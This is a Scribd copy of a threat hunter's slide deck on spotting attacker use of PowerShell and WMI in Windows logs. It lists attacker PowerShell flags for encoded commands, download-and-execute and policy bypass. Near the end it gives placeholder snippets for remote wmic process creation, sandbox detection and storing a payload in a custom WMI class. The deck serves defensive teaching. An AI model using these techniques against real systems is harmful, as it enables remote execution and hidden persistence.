Scribd
Upload
57 views

Windows Logs Forensics - Powershell and WMI

This document discusses how PowerShell and WMI can be leveraged by attackers due to their powerful capabilities for system administration and interaction. It provides examples of how these tools are used in real-world attacks and recommendations for establishing visibility and detecting malicious usage. Detection and defense requires baselining normal usage, identifying abnormal commands, and monitoring logs for suspicious WMI and PowerShell activity.

Uploaded by

20dominic
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
57 views

Windows Logs Forensics - Powershell and WMI

This document discusses how PowerShell and WMI can be leveraged by attackers due to their powerful capabilities for system administration and interaction. It provides examples of how these tools are used in real-world attacks and recommendations for establishing visibility and detecting malicious usage. Detection and defense requires baselining normal usage, identifying abnormal commands, and monitoring logs for suspicious WMI and PowerShell activity.

Uploaded by

20dominic
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 39

• Quick Background

• Malicious Possibilities
• Real-World Examples
• Detection & Defense
• Joe Slowik, Adversary Hunter
• Current: Dragos Adversary Hunter
• Previous:
• Los Alamos National Lab: IR Lead
• US Navy: Information Warfare Officer
• University of Chicago: Philosophy Drop-Out
• Scripting and interactive language
• Introduced in 2006, integral to Win7+
since 2009
• Full access to COM & WMI for system
administration
• WMI = Windows Management
Instrumentation
• Interactive and scriptable framework
for local and remote administration
• Frequently accessed via PowerShell
http://oversitesentry.com/wp-content/uploads/2015/08/wmiarchitecture.png
http://kevinpelgrims.com/blog/files/images/2010/02/powershell_rsm.png
http://www.opentechguides.com/how-to/article/powershell/132/get-
system-info-remotely.html
https://4sysops.com/wp-content/uploads/2013/03/WBEMTest-Translate-into-PowerShell.png
• PowerShell is a powerful,
useful tool for network
administration
• Widely used in Windows
Enterprise environments
http://www.freeiconspng.co
m/img/17209
• WMI enables significant access to
review and modify system data
• Access via PowerShell allows for
scripting and automated possibilities
• PowerShell’s ubiquity adds a significant
capability to potential attacker
• Enhances ability to ‘live off the land’
• Expands initial infection vectors
Command Use
-EncodedCommand Accepts Base64-encoded input for
execution within PowerShell
(New-Object Download a file from a remote location;
System.New.Webclient).DownloadFile() can be piped to Start-Process to execute
-ExecutionPolicy Bypass Circumvent system limits on script
execution
-WindowStyle Hidden Hide the command window from the user
-Invoke-Expression Execute arbitrary code or commands
VBA

Startup
VBS
.lnk
Delivery
Vectors

Registry BAT

JS
https://adsecurity.org/wp-content/uploads/2016/02/PowerShell-Detection-NetWebClientDownload.jpg
• WMI is also ubiquitous, potent ‘dual-use’
• Can enable:
• Complex exploitation, persistence of
infected host
• New vectors to pivot within network
• PsExec-like remote execution
• Malicious file/script storage
• Persistence when combined with file or
registry activity
• Pentesting frameworks
• Crimeware/Commodity malware
• APT
• Malicious VBA decodes to PowerShell
• Retrieves, then executes ransomware
payload
• WMI filter retrieved on schedule
• Returns base64-encoded PowerShell
• PowerShell re-launches backdoor

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
https://www.carbonblack.com/wp-content/uploads/2015/12/PS7.png
• Command
execution
CMD • Execution
Parameters

• Interactive and
Scripts
PowerShell • Flags, Modifiers,
full Visibility

• Log Events
• Correlate
WMI with Other
Activity
Download Process
Upload Execution

What is
required to
achieve
‘bad’?

Encode
Decode Persistence
• Sysinternals Sysmon
• Windows Loggging Service (WLS)
• WMI Logging via WMI Subscription
• PowerShell Logging
• Proprietary Host-based Security
• WLS incorporates PowerShell logging natively
• Otherwise:
• Windows 7+
• Powershell 5.0+
• Enable logging!
• See:
• https://www.fireeye.com/blog/threat-
research/2016/02/greater_visibilityt.html
• Sysinternals Sysmon – latest version
includes WMI visibility
• But logging/alerting will need to be
tuned
• DIY via WMI Subscription creation
• Otherwise – commercial products
Establish Baseline Identify
Visibility ‘Normal’ Malicious

Create Alerts Develop


& Alarms Response
• What PowerShell/WMI scripts are used
in ‘normal’ network administration?
• What commands never have legitimate
use?
• What – if any – items require
whitelisting?
wmic /node:REMOTESYSTEM process call create “EVIL_COMMAND”

SELECT * FROM Win32_BIOS WHERE SerialNumber LIKE “%VMware%”

$BADTHING=New-ObjectManagement.ManagementClass($REMOTESYSTEM,
[String]::Empty,$null)
$BADTHING[‘__CLASS’]=’Evil_Malware’
$BADTHING.Properties.Add(‘SomethingEvil’,[Management.CimType]
::String,$False)
$BADTHING.Properties[‘SomethingEvil’].Value =$PAYLOAD
$EvilClass.Put()
• Create Event Consumer: performs action when
triggered by event
• Pair with Event Filter: events of interest
• Filter to Consumer Binding: bind filter to
consumer
• Export results to log file, data store
• Credit: https://www.fireeye.com/blog/threat-
research/2016/08/wmi_vs_wmi_monitor.html

You might also like